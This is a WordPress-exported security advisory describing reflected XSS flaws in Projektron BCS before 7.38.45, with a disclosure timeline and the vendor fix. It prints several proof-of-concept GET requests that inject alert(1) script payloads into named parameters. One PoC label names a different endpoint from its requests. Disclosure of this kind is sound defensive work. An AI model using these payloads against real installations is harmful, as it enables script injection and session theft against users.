{"id":16559,"date":"2021-07-07T13:05:06","date_gmt":"2021-07-07T11:05:06","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0018\/"},"modified":"2021-07-19T14:08:24","modified_gmt":"2021-07-19T12:08:24","slug":"usd-2018-0018","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0018\/","title":{"rendered":"usd-2018-0018"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0018 | Projektron BCS \/ All versions before 7.38.45<\/span><\/h1>\n<p><strong>Advisory ID<\/strong><span>: usd-2018-0018<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: Projektron BCS<\/span><br \/><strong>Affected Version<\/strong><span>: All versions before 7.38.45<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Reflected XSS<\/span><br \/><strong>Security Risk<\/strong><span>: High<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.projektron.de\/bcs\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.projektron.de\/bcs\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed<\/span><\/p>\n<h3>Description<\/h3>\n<p><span>Reflected XSS attacks (also called non-persistent XSS) occur when a malicious script is reflected off a web application into the victim\u2019s browser. 
The attack is typically delivered via email or a website and activated through a link, which sends a request to the vulnerable website; the response reflects the payload back, so the malicious script executes in the victim\u2019s browser.<\/span><\/p>\n<h3>Proof of Concept (PoC)<\/h3>\n<div class=\"x-text\">\n<p>The \u2018editor\u2019, \u2018oidnamefield\u2019 and \u2018oidfield\u2019 parameters of \/bcs\/eventdeputydetail are vulnerable to XSS.<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>GET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;_pcc_mode_=Target&amp;editor=TokenInput39390'%3balert(1)%2f%2f152&amp;oidfield=eventdetail%2Csupporter%2Csupporter&amp;oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1\n\nGET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;_pcc_mode_=Target&amp;editor=TokenInput&amp;oidfield=eventdetail%2csupporter%2csupporter51042'%3balert(1)%2f%2f430&amp;oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1\n\nGET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;_pcc_mode_=Target&amp;editor=TokenInput&amp;oidfield=eventdetail%2Csupporter%2Csupporter&amp;oidnamefield=eventdetail%2csupporter%2csupporter_entitynames14437'%3balert(1)%2f%2f761&amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h3><span>Second Proof of Concept<\/span><\/h3>\n<p>The \u2018description\u2019, \u2018InitialApplyButtonsOnError\u2019 and \u2018HighlightedApplyButtonsOnError\u2019 parameters of \/bcs\/eventdeputydetail are vulnerable to 
XSS.<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<pre><code>GET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;eventdetail%2Cformsubmitted=true&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;eventdetail%2C%21attributetoggle_name=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;eventdetail%2C%21attributetoggle_state=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;eventdetail%2C%21attributetoggle_description=true&amp;eventdetail%2Csettings_dialog_opened=false&amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;eventdetail%2Cedit_form_data_submitted=true&amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;oid=1502784743839_JAppointment&amp;action%2CSaveAction%2Ceventdetail=0&amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;pageentity_is_new=true&amp;user=Entwickler2&amp;new_entity_init_attributes%2Csubtyp=deputy&amp;pagetimestamp=1502976689686&amp;transactionId=1502976689702-6759310571525836&amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&amp;PageForm%2CformChangedIndicator=true&amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&amp;eventdetail%2CApply=eventdetail%2CApply&amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1\n\nGET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;eventdetail%2Cformsubmitted=true&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;eventdetail%2C%21attributetoggle_name=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;eventdetail%2C%21attributetoggle_state=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;eventdetail%2C%21attributetoggle_description=true&amp;eventdetail%2Csettings_dialog_opened=false&amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;eventdetail%2Cdescription%2Cdescription=&amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;eventdetail%2Cedit_form_data_submitted=true&amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;oid=1502784743839_JAppointment&amp;action%2CSaveAction%2Ceventdetail=0&amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;pageentity_is_new=true&amp;user=Entwickler2&amp;new_entity_init_attributes%2Csubtyp=deputy&amp;pagetimestamp=1502976689686&amp;transactionId=1502976689702-6759310571525836&amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2cApply76429'%3balert(1)%2f%2f411vxq6nz&amp;PageForm%2CformChangedIndicator=true&amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&amp;eventdetail%2CApply=eventdetail%2CApply&amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1\n\nGET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;eventdetail%2Cformsubmitted=true&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;eventdetail%2C%21attributetoggle_name=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;eventdetail%2C%21attributetoggle_state=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;eventdetail%2C%21attributetoggle_description=true&amp;eventdetail%2Csettings_dialog_opened=false&amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;eventdetail%2Cdescription%2Cdescription=&amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;eventdetail%2Cedit_form_data_submitted=true&amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;oid=1502784743839_JAppointment&amp;action%2CSaveAction%2Ceventdetail=0&amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;pageentity_is_new=true&amp;user=Entwickler2&amp;new_entity_init_attributes%2Csubtyp=deputy&amp;pagetimestamp=1502976689686&amp;transactionId=1502976689702-6759310571525836&amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&amp;PageForm%2CformChangedIndicator=true&amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2cApply11494'%3balert(1)%2f%2f133etp0ac&amp;eventdetail%2CApply=eventdetail%2CApply&amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column 
x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Update to Projektron BCS 7.38.45 or later, which contains the vendor\u2019s fix. In general, make sure to encode user-supplied input for the context in which it is reflected (HTML body or JavaScript string) before writing it into the response.<\/span><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li>2017-09-15 \u2013 First contact request<\/li>\n<li>2017-09-19 \u2013 Vendor accepts all reported issues<\/li>\n<li>2018-04-06 \u2013 Vendor provides a new release, 7.38.45<\/li>\n<li>2018-06-06 \u2013 Security advisory released<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>These security vulnerabilities were found by Stefan Schmer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0018 | Projektron BCS \/ All versions before 7.38.45 Advisory ID: usd-2018-0018 CVE Number: N\/A Affected Product: Projektron BCS Affected Version: All versions before 7.38.45 Vulnerability Type: Reflected XSS Security Risk: High Vendor URL: https:\/\/www.projektron.de\/bcs\/ Vendor Status: Fixed Description Reflected XSS attacks (also called non-persistent XSS) occur when a malicious script is reflected off a web application into the victim\u2019s browser. 
The [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16559","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16559"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16559\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}